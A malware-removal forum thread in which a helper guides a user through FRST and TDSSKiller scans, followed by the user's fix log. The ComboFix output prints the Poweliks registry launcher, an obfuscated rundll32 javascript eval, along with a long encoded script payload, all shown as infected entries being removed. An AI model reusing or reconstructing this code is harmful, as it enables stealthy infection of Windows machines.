Error: (10/27/2014 04:17:20 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:17:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 09:32:18 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
 
Error: (10/23/2014 10:16:54 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
 
Error: (10/22/2014 03:57:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1d74
 
Start Time: 01cfee3250df245f
 
Termination Time: 41
 
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
 
Report Id:
 
 
System errors:
=============
Error: (10/28/2014 10:01:55 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/28/2014 10:01:25 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (10/28/2014 09:57:10 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:54:23 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:50:09 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:43:17 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}
 
Error: (10/28/2014 09:41:53 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {B7A9F07F-7443-4925-BCF9-BAACAD2A0A06}
 
Error: (10/28/2014 09:23:13 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:16:09 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:10:16 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
Error: (09/17/2013 00:57:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1955 seconds with 600 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:42 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:03 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 25 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 40%
Total physical RAM: 1993.25 MB
Available physical RAM: 1183 MB
Total Pagefile: 3986.49 MB
Available Pagefile: 3138.99 MB
Total Virtual: 2047.88 MB
Available Virtual: 1899.98 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:139.55 GB) (Free:101.02 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:7.49 GB) (Free:0.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 3B723303)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=139.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=7.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 


#4 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 29 October 2014 - 03:00 PM

Hi,

the next steps are:

Step 1

frst.pngfrstfix.png

Press thew7.png + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    CloseProcesses:
    HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    cmd: type "C:\ComboFix.txt"
    2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
    2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:


Step 2

frst.pngfrstscan.png

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste the log in your next reply.
Step 3

Please download TDSStdsskiller.pngiller and save it to your Desktop.
  • Start tdsskiller.exe with administrator privileges.
  • Accept the EULA and the KSN Statement.
  • Click on Change parameters.
  • Make sure that all available options (except "Loaded modules") are checked and click OK.
  • Click on Start scan.
  • If any threats are found don't delete them but choose the Skip option for all of them.
  • Click on Report to open the log file. (It is also saved at C:\TDSSKiller.<version_date_time>_log.txt).
    Copy and paste its contents in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#5 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 30 October 2014 - 08:26 AM

FIXLOG.TXT:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 30-10-2014
Ran by KELI at 2014-10-30 09:15:55 Run:1
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
FF Plugin: @microsoft.com/GENUINE -> disabled No File
cmd: type "C:\ComboFix.txt"
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
 
=========  type "C:\ComboFix.txt" =========
 
ComboFix 14-10-27.01 - KELI 10/28/2014   9:50.4.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.1993.1012 [GMT -4:00]
Running from: c:\users\KELI\Desktop\ComboFix.exe
AV: McAfee Total Protection for Small Business *Disabled/Outdated* {86355677-4064-3EA7-ABB3-1B136EB04637}
SP: McAfee Total Protection for Small Business *Disabled/Outdated* {3D54B793-665E-3129-9103-206115370C8A}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^A4EAAA==n{F+2i@#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*i@#@&S4k^+cne'c+b@#@&`@#@&7DDz@#@&i @#@&diWE mOkKx~^9x`*@#@&id @#@&7diYMX@#@&77i @#@&i7diDnO!Dx~CcIno"nmNcrCnSH'-kG0DhCD-whbmDKdW6Y-'UnY,0Mlh+AGM3~/OEa-wU9w-w-yRTRlTF {'-kwJ*i@#@&didN@#@&d771lY14`#@#@&77dP@#@&d7d7.Y;D ~!p@#@&7id8@#@&idN@#@&7i0; mDkW P9cE*@#@&di @#@&iddXxxhPz^Ok7+or8Ln^D`EHka:^  jD\n.oHJC:PhRc!r#i@#@&i7dXRGwxcEV2KrSEB0l^dn#p@#@&d7da k+UNvbi@#@&77iE0UxmR36aC N3 \bDW :UYUY.k odcr]Yhwu--rbQEc/!4dY.r ocEcslkY(U9+66WvJ&J*Q8#I@#@&idd!0 O'!0U_rROhaJi@#@&didE6Ox0cZM+CYnP6Osbs+vEWUD~Y.;~RF*I@#@&7idb0`!0Db@#@&d7dP@#@&7idd!WYcDbOn`XRM+dwGUk+$W9z#p@#@&7idd;WDR/VKd`bp@#@&ddid!W'6R/DlOn:+6Dok^+`!WU~DD!+bi@#@&id7d!WY{0 !Ysrs`;0 O*i@#@&didd!0kxE6Y ra+U)kK+XO?DD+mhc#p@#@&d7d7;6/ ICNv bI@#@&d77iEWRq.bYnvE6/R"+m[`!0ORUk"n  #*I@#@&ddi7;0kR;VG/nc*i@#@&i7diEW ;VWdnv#I@#@&7id76RG+VYok^+cE6xObp@#@&i7dilR";U`r-rJQEWU3JwJ,&;!knO,zxG./OlMOr~TBF*i@#@&di7d6R9+^+OnwkVcE6x#p@#@&did)@#@&d7N@#@&7dSxlc2a2mxN3U7k.W hxOUYMkxT/vE]SkUNbDYE*i@#@&7d6'xA~b1Yb\n(68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrbi@#@&7dbv*x6RsKsND2XrdYk`S_E-wdH/AWScr#I@#@&dd2xS_E-'E3`r+cQJ/H/SGh+cE)r/zdD+:2+J*_J'wAk NKhdwGADdtsV'--qc!-w2KhnDk4Vsc+X+Jp@#@&7dStrV`ZWcsk^n2Xk/Ddcw*#@#@&7d`@#@&d7dS-'6R!nDsksnj+./bG `A3J'-xKY2l9Rn6Jb kwVbO`rRJ*I@#@&idiE['EEp@#@&di7Ea'EEp@#@&77i/AkD^4`A7$ZT#@#@&i7dP@#@&did^Ck+PrXJ=@#@&i77db0vkcb@#@&d7di`@#@&d77idE[xrtOYalJz[Kh VWmNchk1DG/K0O 1W:J[WSxVKC[zOzRzz10+FTcZO1 8{ c*C* 4[m2RON8848m*6G+zg+OsX TjhF{Xcc+6EI@#@&did7d;2{J4YD2)Jz[GSxVGC9Rhk1.K/G6YcmWsz9Gh VGl9z$&Gz,J$fOAA8ooO+vZ,Rc$qZO1&2*O+fT/l%!zb{zqr NGS/U+D7+M+!Z&R|~,0O&! avWO2g! +X+ri@#@&77idN@#@&7didnsk+@#@&7id7 @#@&id7id!N'rtDOw=z&NKhUsKlNchk1DWkGWYcmK:&NGA VGl9&!J%&^J!%^qO0Cc *1cW c604 ,9m FX!O!XF%mOnzg+Ywa+!Un8{a% 6nJp@#@&id77iEwxE4YOw=&JNGSx^Wl9RsrmMWdW6Y ^K:z9Gh VWm[&2JZJ2&2/3O,X%2R Z!fRW**9R~v0F Rf$+FZAcWbW&bx[WS/pK |AO%O&! a0v 2gM +anri@#@&i7di8@#@&idd78M+C3p@#@&@#@&idimlk+,Evr)@#@&id77khkD^tvh\]qD#@#@&id7d`@#@&d7di7mm/n~r!Jl@#@&d7di7b0cbvW#@#@&di7di @#@&id77idEaxJ4YYal&z9WSxsWC[c:rmMG/K0O 1W:&[KhUVKC9zfJZJ%z2ZR/slF3O8f19 cfz)Ozb2zRXZW%GF/fTXlZ&bUNKhdc!OF$Ov0,2T 6WRs/Eri@#@&did7d)@#@&7iddinVk+@#@&77didP@#@&d77id7EaxJ4YO2=zz[GSxsWm[c:r1DK/W6Yc^Wsz[WSxsGmNzz&GJ*zz{XA;!8GRvf/AO*GGORs)* bs$X; qAz/lc&qk NWS/+ ! |$,+%1fZO6RRs/ErI@#@&idid78@#@&id7di8DlVI@#@&d77i8@#@&i7id8M+m3i@#@&i7d)@#@&didrWvmN c#{'!*@#@&didP@#@&d77iNcE9bi@#@&77i8@#@&7id[`!2*i@#@&di8@#@&diclc2U\bDGUs+xDcJhDW1nd/r#*`ElEb{Jr+X~`]KnaDR2U^KNrxTD=))UZ&qRV+DjYMkUov$/G \+MOT=)sMGhAm/v*?O.bxL`E[Cx*9}aGf}Gx}U.!e2I2( Wo}ypg/o^G9pK9/#~tmsoY&Zt(i!sH5qFsN!#H|oA7^ ^!C OEnP)kK s!tVsT(&x*nUI`^xjVF.Zo q"*mV#4o.!TBoA4mssO}p]^mUHk F~t^hwY}p]^mrt582129M^\4N!XF.Zo F"*^!jNq;]?\(I8^h*`+oAsn#Oq4+V0p?0G9}K9Zj]`+pA^} .2(M"VmNF(}(~h]MOYe ^E(:Gv5&.H^h.!NAI-4 oa4r*At\w8hj2+ X44 VN}o1"\8k4_3KF2lV[X8nehaV52}o`&V.[!.DS^9s}ha^5fIa8 WE}pgy} qb4uV}eqFsnZx?}q}ktg!t"2t XV}yo!\?qaFj6(j2V"N!#DSs9^t:XVef"w4+*!I Fa[;*$1&gV4q9knjxFCX3tpxA5yHV1&196%wUNqc2SV]^}hV!tj"*8hwYl Hg4+I88VjG&3^EKq.D8&x*PO3[ XVqbA3\:sk^+jaS0Is}hs!}#Il^M`W(U5kS/BG4!s.^H6}9x/lqHki jt8Mj3J3wEmysf(Ms.^z6~NoI-p+a4mfHbJsDKnpg!} T!Kp.k[VV%I(g!IV.kt9t[MjNFPk1ZTV9xsIl^!.;NqVd}!#HSVI^t:^Etig\4UHZmU.N[V,znZx?.w1StgweXre 8VSA4w\M.;n#1a}H6}N Bkl HbJsDKnpg!} T!jh.s8V.%9M^\4b*GeX/Clx}+OENs#E9MV78U19rNwPN!o!}!sHtZS3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFf}Wx/UIi(~Vp .a8M"V^kl2t \w4s#1\(IK8+pKq0V;Nh1M}jqk(V~FehXw5za&l I^} VPm1/Ks.2i X\[ZXCpx!Nqo/&kh0ih.ZNo9;.usS}jh0iMwXe 8VN!#Hmz3!iy.TU8h4V.Dtl!e("w8+lM4Vox1XobiU.!NVVO}jag5 *4t j3(r0Gf}GxZp9^[_.z(kz3._VStjxFCX3tp&Ep2BVI(I^#uVS}Uo2rATnZp!g/o^:[ lLN!s74rA e5!F;(k1ZT3xiMwXeZoFoDp5oBt(.ZtpqKjV,"lp]a4+cO\ZX1e l35p]7mU3OBwIz9`w(UA(i&"XClxpjz3Kq1396^JoY55o944 #Z}pqKiMOyCp"w4+*OHj6geq*VI("\m 3OBs"X[`wpj~4j2]Xm* pjb0j_9-5+#0Np9^FKk1/L099oHlmfI^8`s"1 jY5s6lK.DA^C~28+8tlqXN}LwG[p9H}q*TI!1D5 V!J39V[3wym+#D5h6atoHGn(X(lV.Ht?8ne:aVef"G9w0E" 67ehskpo1"} qb4uVGegWtjzYp X0q/I6J06-I w!lq,!JVgh8M^!F/xmqbs4dKs9JV.XNqsdmzLbjfV.[MjYJh"/4/(a0P/g/T3BxsjEmysstjlt[M^ ti8VNV4\\CHOBo1lm2Is4io.m+.De:X*JV9VNo]lm!jK(0F2I&x\my,s[Zl(CWy\rl.4 Ht\:.}epIaNs.H}p]K4+I.(k0G9}K9ZpB^Nu.H8bbVjly5q}^P:w!C(\VP j!lV131X*_tpIg}oIG4+}KqVN^[s~X8+gA}!]H}p1.(b3;Ul 4yY^FZ"E[X/J3zW8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*(Il34V.Ut\NF2lV[z8n5s2VI&pTifV.NV.OSsB84UIa8`Ej l!}pB7mo1^^ }2I jyS0t48:"/t.xVtrTWKs#&dj,bCh.NN;AB4U]5NuqaJZ".8Ugt}h#}5pIa[s.H\("W4yI.J39V[28V[!4\};Lk" .ZP ,0Nq6s?!o!}!6^(k0Ej l 4+O^|/I![q6dd2zW9AF7tCj/t?0wFj0/9w$X( 1^tu.H}U32rATnZp!g/o^4}U^!}#O9(jb0^GF85 OENs.H[sZv63\X8+8Z5oHVgLI:[u9a4smGqst\NU1 F&4\e 8! oD.hFa#jNtj!9h+jw782\Y8M46eh8t?^BlsV48#}Dlj.p}#[_mu1m8 XM8T\WmiTH5iwUe`wtIa|4qVj# D(] OF hO/I $/mCsm]+snjssG oD+!Fa#.96#T9t?sB4+!Fa#jNqq3DsNZs~}jwc\s4A#h8/+q]1\2}Wjo}K50.(?oBNlu1b]y^;n!D5KioxN3sA]0,39!wc.2oS swj]y^W V83INosCA\8V6&jsIGl!H!439WCF4L}i83IUHw}!60]0I(`:x?+qqHP3xc\s1! V9?+j2(I3tUeUt+5.tCIUt pT6l]:jH}q9tI!#:NqV0i8N\IF"fK^}mt&K\n(\*Csx?|ys/`.}D]3wj}^w5HU[ZrPs;C j2Jf9c+Pt7j/,Ajw2q:y4WHow7[s\fj("fi3^!I`#qmjImthN~p:tJK!#GpT6N}x^H#TgKKoo;}TpWt8A45?O6?sI^Cja5t(^|ihjKI [An!. tTs~p`,"K!VXI#3y6M8H !j*K!]^li6UtsV\"2^Lj_I2i3"wnVgCt"x5rAoA`2Ya#PHSl^.eji37?pAUtVgHih\*Ko4sjipHjoAo5:"A1^9;\Fw3iW\ih\*IVt:9!*N[#NA}s}fKh]"KTw0tjg|#!\KKs]bppw2}y66}j^!KNVx^MgZe3w2ni"h5Z]k5Ls;CT1A|Z2X+PeZj9IA\Fj2C#45Nz0S9Ia\woT:y~5ly17#!l?e!xI#pI*.N499fsGjp.^j`9opiox?3N;}3jA}i9hp o~ppN~}`s3t&I*+^._8!A\6jg|ih\wI [An!.VtT.~p`VTKotxKhhl}jgHFq~nlT}2}36Vj:s#"FgA+ Vo K9K[FavPP"!?ZH91&Vh69jHpq,+K+4N49AV (5*}T^!+i]x?3t;}0.$5jwpHy3.8!jAJ av^3ADH8H&Ik,Uts1ANyVU1#]sjUV+ ("&i3wpN+VZ1Vs~}`s$\yg&p0I~}L~K KAc}#w*KA]&`2Vjt%Vq1AVdI%#x3s0}&jH u9IIo4slU9&8213mMgZ1`9"Fyg&P&gqCPzy1V2.`jV~83p7}V.iSqtspTw~Hs~2}V^11To&!Ia\woT\y4L.qN+62w3exjHCUwIp`oA5!w`ti1tl s$pio~pThH}&"VPVwp? ^H9A~P2HzmKw5}Z,q f~LnV9r#U\;jNtE`V$ !Yxlj}eNT}25qtm8F4Kt3w*p%]yroA~}`s3t2w1j0sU^j"c[!S\#!\ZH:#A"L2l}#Ahl:1oI 4s%s2HC"9i3^!KiHGlus~]y,/dyg.?`2WCkRht(gfPP4Z}^4/93w2C3s~.^V+m+^M+!,48("}e 84 sj.qVo]2AXq:O/IsFkCCwk8w|isacqoYj:Fa##N^.ZNAmq2743}7]:46PPxt?sB4?sV4C0wOm.j(l8N_8&jl8 XM^!XWmj2CIjwUe t\5qF*4 sj.fso] w|ihwc4 sj.f.mjZ.f5jwApooS 2w8X*t383I 4qj:tb]it&js1Gm+B_r wWCF41}i^!pi]VKTI2}otpf~5jjI_64lP"M\ijcmwsE:2tUt!tK5y*dpU4M!1~P"M^Tj34!]VI3tUe^9XILxrp oS#y"l]Fx* s9k?wBkCwN6owVNsN9KusV}i6G# w2t#g& ]:.T6N#A16jVax+b,l[x^;iV&DC XI.sq2UV.s hWHN2pXHiBM}ip7[&4*HhOpST]&jP.h6Voa:O!.01x[2gpj("s]i4wIw2:\!s~63yt}`19k!h;+i6o}fghiixxi94 j!s~j2sf\Mjw?^t^nja?t.gM[TADIq[x5js~Pf1tl:soPeW4i6It(^Ht!jwKoBsli6Ajq1}9C9?IVV+i!9x\VTc}iwp?ys.tyA$##t"pU,BmoBsjT6Utx^H !\II9Bxm3.;tA2+`3&yjqI"8kO?tx^2th\&KsHFj!IstUN}}wsK?h]^pTw`tVgr#!xA+U[G43cljoI6}j^h5Z9b}j"*]C~L]!xZH`BD5!pM}PVl1NI}13}..iIa s4&J"~51!VS9Ih\wt.I O(K^9N}Vw.[L^63^!H`H99."}V.~p`V(ITB;Iis~]&~AeiwANTo~pip.[NVjj9\pU%l}!a?t:^M[TADI`tI"js~jpIt.0V649s~pThMi2OD]993K3txH#._iZs.9}1812 xa1HC"S}T^y+`0cgK9~8f}hlV1dH3t\N9VGj("*]3^q?3B;Iis~}jb"mKg\I`27Cxah}?kyif9kS8B:`!I2C m8.V}j+p2\NuN5}.~&CP5 pio~pis \2N/"2wZHw1\\gAi(^H}f9p?j#:}.5Zj 6V1`Vep ]GNi6^[Fw2th\;mV47mTtKeZqq5VADH2Nh^!4w\ft!CsjI?`o/"Z,0t#p7.s}9?V(Zj3t;jjZ\}i45}!VS9I 6AF#\&aypqIb[jX;^.wA}iwf?^]V5!6$^is~p`s9K/OGN/Y}}.~9t"x5H3ohm"9a\jtU:F\5HV1+#!l[:a?HhlIlq2m!Va#st2IGN%.o27o10}(^ZHuIcj3o~pipS}`Fj5."6I_N2PZOjt3&6HiwMH:sA`2,a\T.wlV}CHp^7rPsGj("9i3^!KiHGlus~#0s3.z\jN}2j(a&]L^V#"4EpZ#A5V}$#fNMl0V(m"4~pis~]3l(#%xhms[_m!6m8y6!m3\Wmq1Deja? Kj}e ZF4qs.jFso]fAks,dIhOklusb] w|isa? o$KhFa#jNpj!9\+jw782\Y]:46P!8t?^Bl1sV48#9Dlj.p5q[Aj!9m8 XM8h8hmq[_5iwUe`9Om.j(ljw782\5PM1\[!9ApoLhj3.`]"VK0FVIsHw+uA\83Xqisjcl!H!43}m^yI!jj4WpsVV\.gc\s`hi%xHw#1\2}hj3wy:A(?oB`+!Ymj2a/ Ug3Iso&KUwa]Ns9f~.j2H6jak^ "Mj39/HVo(U2tUiT9.5jtA4!sVH!YW\s4.iP&*I!H.}35H]8}G\295?w90n2ak83Whn9~5}8s(gwm t01`FVIVOw.%I4 s"qisgc. o&?h6m^yI!:j9MlyVV\C^c\s4\#Pg/+^oL\252]ft.5N9}?oBspsI0j2ah Ug3I%s_1 *a]NHzf~.qqHnMX16M"M#T"9Nj2C3tUthty50N luLS9t0 swvPpg3IVoG1 Yb]2VBqswj?w9"CCjl sx&n9~.KqBq\CA^^+IVI`Hql+B_+iVIiV"qihwx}i]AmPAm8y6!1383I 9S]39!8Xk!C/kcp`oCIjwUeUtM48I$pio~I3tUe3XrtT4hIs2.}3}Z[V,/f~(1wWW\yTc6M"M[h4??s^&"2tUeT6mp2}i}o2.}3}WtFt&CP~AK ^WpiFaJZ1\::8tIV}a[F^3iXDHthafK^]}jwI 3sH|8VTKhH~j3w$iVAFC XI.h2A?s.A oWz9&5*H`1s6j\LjjW*eTwc+:]\:LVN}poSjwI+N+]NjT60e.gHiha*KoBAp%I~6Vs\\jgKKw1G}!X.}x^HiixxI;1x`2,~6 sn}s1f+r0Z43*ajXC3^/r ox43}\]_}3"f"tI0s~}jA [y\Ht!4w?s]tjC928fIqlAVTKhsxN3}+}?ky}V4wK3]t4i65j`V3:O/Ks9x\j\?}.zDjqjmyst(Na\o}2l:s mT3lpTYU}.\sP+DI.sB&.iW7\w}f\yt6NZp.PMXx\yw&]9g.IVs5tYa#Ps.l^jAH3TWppA`#&^H#o9*?qt~.PA~6Vm+j3AhHVI" 3wxJ 9pefjFI;OA}Ks~H!hlHAVTr ow}iws# 1&ts9Z+ 4qKsI$#j.Bj.z*.^wx[Vww\20cCP"&jq[A5js~jp.wI`V]pio~piIl8 Xei"pj+oKjh5lJy1}Dw?^9o}K9&[XDCCiwAp`o9tj9Aj 6V50VTIhBxmTsgJy42is9w?qtAH#.hCw2T\swl?Vm762DL[392Jf9hHA]9:3}b}s9_K.1 